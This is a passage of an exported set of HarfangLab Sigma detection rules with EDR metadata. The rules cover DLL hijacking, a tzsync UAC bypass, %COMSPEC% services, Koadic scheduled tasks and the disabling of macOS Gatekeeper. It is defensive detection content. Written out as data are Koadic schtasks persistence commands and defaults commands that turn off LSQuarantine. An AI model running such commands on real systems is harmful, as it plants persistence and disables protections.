'?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5a89c980-2d01-467d-95ed-eaa6c2a7bcd9",
"rule_name": "DLL Hijacking via gpresult.exe",
"rule_description": "Detects potential Windows DLL Hijacking via gpresult.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5a9dbbfc-6cc7-4475-b35f-03eccfad4915",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594422Z",
"creation_date": "2026-03-23T11:45:34.594426Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594434Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dsquery.yml",
"content": "title: DLL Hijacking via dsquery.exe\nid: 5a9dbbfc-6cc7-4475-b35f-03eccfad4915\ndescription: |\n Detects potential Windows DLL Hijacking via dsquery.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dsquery.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\atl.dll'\n - '\\dsprop.dll'\n - '\\netapi32.dll'\n - '\\ntdsapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5a9dbbfc-6cc7-4475-b35f-03eccfad4915",
"rule_name": "DLL Hijacking via dsquery.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dsquery.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5aaebba7-01f9-43b3-8924-5ea1e6098157",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588252Z",
"creation_date": "2026-03-23T11:45:34.588256Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588263Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_nltest.yml",
"content": "title: DLL Hijacking via nltest.exe\nid: 5aaebba7-01f9-43b3-8924-5ea1e6098157\ndescription: |\n Detects potential Windows DLL Hijacking via nltest.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'nltest.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\NTDSAPI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5aaebba7-01f9-43b3-8924-5ea1e6098157",
"rule_name": "DLL Hijacking via nltest.exe",
"rule_description": "Detects potential Windows DLL Hijacking via nltest.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5ae07f49-3dd1-490d-affc-811f90f709d7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074093Z",
"creation_date": "2026-03-23T11:45:34.074095Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074100Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/security-labs/exploring-windows-uac-bypasses-techniques-and-detection-strategies",
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_uac_bypass_tzsync.yml",
"content": "title: UAC Bypass Executed via tzsync\nid: 5ae07f49-3dd1-490d-affc-811f90f709d7\ndescription: |\n Detects a UAC bypass via a renamed tzsync.exe and a missing manifest.\n A manifest file is an XML document embedded in or placed alongside an executable that defines application metadata, including runtime behavior, dependency paths, and privilege requirements.\n This UAC bypass method involves creating a malicious manifest file that specifies a custom path for loading the cryptbase.dll DLL.\n When migwiz.exe (renamed tzsync.exe), which lacks an embedded manifest and has the autoElevate attribute, is executed, it loads the attacker's DLL from the specified path with elevated privileges.\n This allows the attacker to achieve privilege escalation without triggering a UAC prompt.\n This approach combines manifest manipulation and DLL hijacking to bypass UAC and achieve privilege escalation.\n It is recommended to investigate the DLL file loaded to determine its legitimacy.\nreferences:\n - https://www.elastic.co/security-labs/exploring-windows-uac-bypasses-techniques-and-detection-strategies\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2021/01/25\nmodified: 2025/01/13\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.002\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: 'Windows\\migwiz.exe'\n #OriginalFileName: 'tzsync.exe'\n ImageLoaded|endswith: '\\cryptbase.dll'\n\n filter_signed:\n Signed: 'true'\n Signature|contains: 'Microsoft Windows'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5ae07f49-3dd1-490d-affc-811f90f709d7",
"rule_name": "UAC Bypass Executed via tzsync",
"rule_description": "Detects a UAC bypass via a renamed tzsync.exe and a missing manifest.\nA manifest file is an XML document embedded in or placed alongside an executable that defines application metadata, including runtime behavior, dependency paths, and privilege requirements.\nThis UAC bypass method involves creating a malicious manifest file that specifies a custom path for loading the cryptbase.dll DLL.\nWhen migwiz.exe (renamed tzsync.exe), which lacks an embedded manifest and has the autoElevate attribute, is executed, it loads the attacker's DLL from the specified path with elevated privileges.\nThis allows the attacker to achieve privilege escalation without triggering a UAC prompt.\nThis approach combines manifest manipulation and DLL hijacking to bypass UAC and achieve privilege escalation.\nIt is recommended to investigate the DLL file loaded to determine its legitimacy.\n",
"rule_creation_date": "2021-01-25",
"rule_modified_date": "2025-01-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5ae1d32b-e95b-4ed0-a035-5b1761a4bd14",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082038Z",
"creation_date": "2026-03-23T11:45:34.082040Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082044Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lexfo.fr/tag/cobalt-strike/",
"https://attack.mitre.org/techniques/T1543/003/"
],
"name": "t1543_001_service_comspec.yml",
"content": "title: Suspicious Service Using %COMSPEC% Environment Variable\nid: 5ae1d32b-e95b-4ed0-a035-5b1761a4bd14\ndescription: |\n Detects a service creation whose command-line contains the %COMSPEC% environment variable.\n Adversaries may use %COMSPEC% as a replacement for cmd.exe when creating a service, the environment variable being replaced at runtime.\n It is recommended to analyze the behavior of the process responsible for the service creation and check if the service has been started.\nreferences:\n - https://lexfo.fr/tag/cobalt-strike/\n - https://attack.mitre.org/techniques/T1543/003/\ndate: 2024/01/31\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1543.003\n - attack.execution\n - attack.t1569.002\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ServiceCreation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\\\*\\ImagePath'\n Details|contains: \"%COMSPEC%\"\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5ae1d32b-e95b-4ed0-a035-5b1761a4bd14",
"rule_name": "Suspicious Service Using %COMSPEC% Environment Variable",
"rule_description": "Detects a service creation whose command-line contains the %COMSPEC% environment variable.\nAdversaries may use %COMSPEC% as a replacement for cmd.exe when creating a service, the environment variable being replaced at runtime.\nIt is recommended to analyze the behavior of the process responsible for the service creation and check if the service has been started.\n",
"rule_creation_date": "2024-01-31",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1543.003",
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5afa7a78-99c9-4aa8-9b87-6ea4220b19d6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.779645Z",
"creation_date": "2026-03-23T11:45:34.617144Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617151Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1036/003/"
],
"name": "t1036_003_platform_binary_copy_macos.yml",
"content": "title: Apple Binary Executed from Suspicious Folder\nid: 5afa7a78-99c9-4aa8-9b87-6ea4220b19d6\ndescription: |\n Detects a platform binary being executed from an uncommon folder.\n Apple's signed binaries, also known as platform binaries, should only be executed from system directories.\n Adversaries may copy and execute such binaries in another folder in order to bypass security solutions.\n It is recommended to analyze the process that copied the binary as well as commands that were executed.\nreferences:\n - https://attack.mitre.org/techniques/T1036/003/\ndate: 2024/07/22\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.003\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|startswith:\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Volumes/'\n IsPlatformBinary: 'true'\n\n exclusion_installer:\n - Image: '/Volumes/*/Install macOS *.app/Contents/MacOS/InstallAssistant_springboard'\n SignatureSigningId: 'com.apple.InstallAssistant.macOS*'\n - Image: '/Volumes/*/Install macOS *.app/Contents/MacOS/createinstallmedia'\n SignatureSigningId: 'com.apple.createinstallmedia'\n\n exclusion_chrome_updater:\n - Image: '/Volumes/Google Chrome * universal Update/.patch/goobspatch'\n SignatureSigningId: 'goobspatch'\n - Image: '/Volumes/Google Chrome * universal Update/.patch/xzdec'\n SignatureSigningId: 'xzdec'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5afa7a78-99c9-4aa8-9b87-6ea4220b19d6",
"rule_name": "Apple Binary Executed from Suspicious Folder",
"rule_description": "Detects a platform binary being executed from an uncommon folder.\nApple's signed binaries, also known as platform binaries, should only be executed from system directories.\nAdversaries may copy and execute such binaries in another folder in order to bypass security solutions.\nIt is recommended to analyze the process that copied the binary as well as commands that were executed.\n",
"rule_creation_date": "2024-07-22",
"rule_modified_date": "2026-03-23",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5afe7952-8754-4b6d-9df2-bb59a0b2feea",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077237Z",
"creation_date": "2026-03-23T11:45:34.077239Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077244Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/offsecginger/koadic",
"https://attack.mitre.org/techniques/T1053/005/",
"https://attack.mitre.org/software/S0250/"
],
"name": "t1053_005_koadic_scheduled_task.yml",
"content": "title: Scheduled Task Created by Koadic\nid: 5afe7952-8754-4b6d-9df2-bb59a0b2feea\ndescription: |\n Detects the creation of a suspicious task used to reconnect a system infected by Koadic back to its command-and-control (C2) server.\n Koadic is a remote access Trojan (RAT) that enables attackers to maintain persistence and control over an infected system.\n The creation of such a task indicates an attempt to establish communication with the C2 server, potentially for data exfiltration or further malicious activities.\n It is recommended to investigate the task's properties, check for any unusual or unauthorized scheduled tasks, and scan the system for the presence of Koadic or other indicators of infection.\nreferences:\n - https://github.com/offsecginger/koadic\n - https://attack.mitre.org/techniques/T1053/005/\n - https://attack.mitre.org/software/S0250/\ndate: 2021/02/11\nmodified: 2025/08/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - attack.s0250\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Trojan.Koadic\n - classification.Windows.Behavior.ScheduledTask\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # schtasks.exe /create /tn K0adic /tr \"C:\\Windows\\system32\\mshta.exe \" /sc onlogon /ru System /f\n # schtasks.exe /create /tn K0adic /tr \"C:\\Windows\\system32\\mshta.exe \" /sc onidle /i 1 /f\n selection_bin:\n - Image|endswith: '\\schtasks.exe'\n - OriginalFileName: 'schtasks.EXE'\n\n selection_cmd:\n CommandLine|contains|all:\n - '/create '\n - '/tn K0adic '\n\n condition: all of selection_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5afe7952-8754-4b6d-9df2-bb59a0b2feea",
"rule_name": "Scheduled Task Created by Koadic",
"rule_description": "Detects the creation of a suspicious task used to reconnect a system infected by Koadic back to its command-and-control (C2) server.\nKoadic is a remote access Trojan (RAT) that enables attackers to maintain persistence and control over an infected system.\nThe creation of such a task indicates an attempt to establish communication with the C2 server, potentially for data exfiltration or further malicious activities.\nIt is recommended to investigate the task's properties, check for any unusual or unauthorized scheduled tasks, and scan the system for the presence of Koadic or other indicators of infection.\n",
"rule_creation_date": "2021-02-11",
"rule_modified_date": "2025-08-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5b03b3fc-3d9b-465b-811a-bc049224fc59",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098135Z",
"creation_date": "2026-03-23T11:45:34.098137Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098142Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_windowsactiondialog.yml",
"content": "title: DLL Hijacking via WindowsActionDialog.exe\nid: 5b03b3fc-3d9b-465b-811a-bc049224fc59\ndescription: |\n Detects potential Windows DLL Hijacking via WindowsActionDialog.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'WindowsActionDialog.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dui70.dll'\n - '\\msvcp110_win.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5b03b3fc-3d9b-465b-811a-bc049224fc59",
"rule_name": "DLL Hijacking via WindowsActionDialog.exe",
"rule_description": "Detects potential Windows DLL Hijacking via WindowsActionDialog.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5b20f331-5f45-4510-a0f2-7116fa857515",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598305Z",
"creation_date": "2026-03-23T11:45:34.598311Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598323Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_gatekeeper_disbaled_globally_defaults.yml",
"content": "title: Gatekeeper Disabled via defaults\nid: 5b20f331-5f45-4510-a0f2-7116fa857515\ndescription: |\n Detects the execution of the defaults command to disable Gatekeeper on macOS.\n Gatekeeper is a security feature of macOS that enforces code signing and verifies downloaded applications before allowing them to run.\n Attackers may disbale Gatekeeper to allow untrusted applications to run on the system.\n It is recommended to check defaults' execution context to look for suspicious processes.\nreferences:\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2024/07/03\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.ImpairDefenses\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/defaults'\n CommandLine|contains:\n - ' write com.apple.LaunchServices LSQuarantine -bool NO'\n - ' write com.apple.LaunchServices LSQuarantine false'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5b20f331-5f45-4510-a0f2-7116fa857515",
"rule_name": "Gatekeeper Disabled via defaults",
"rule_description": "Detects the execution of the defaults command to disable Gatekeeper on macOS.\nGatekeeper is a security feature of macOS that enforces code signing and verifies downloaded applications before allowing them to run.\nAttackers may disbale Gatekeeper to allow untrusted applications to run on the system.\nIt is recommended to check defaults' execution context to look for suspicious processes.\n",
"rule_creation_date": "2024-07-03",
"rule_modified_date": "2025-01-20",
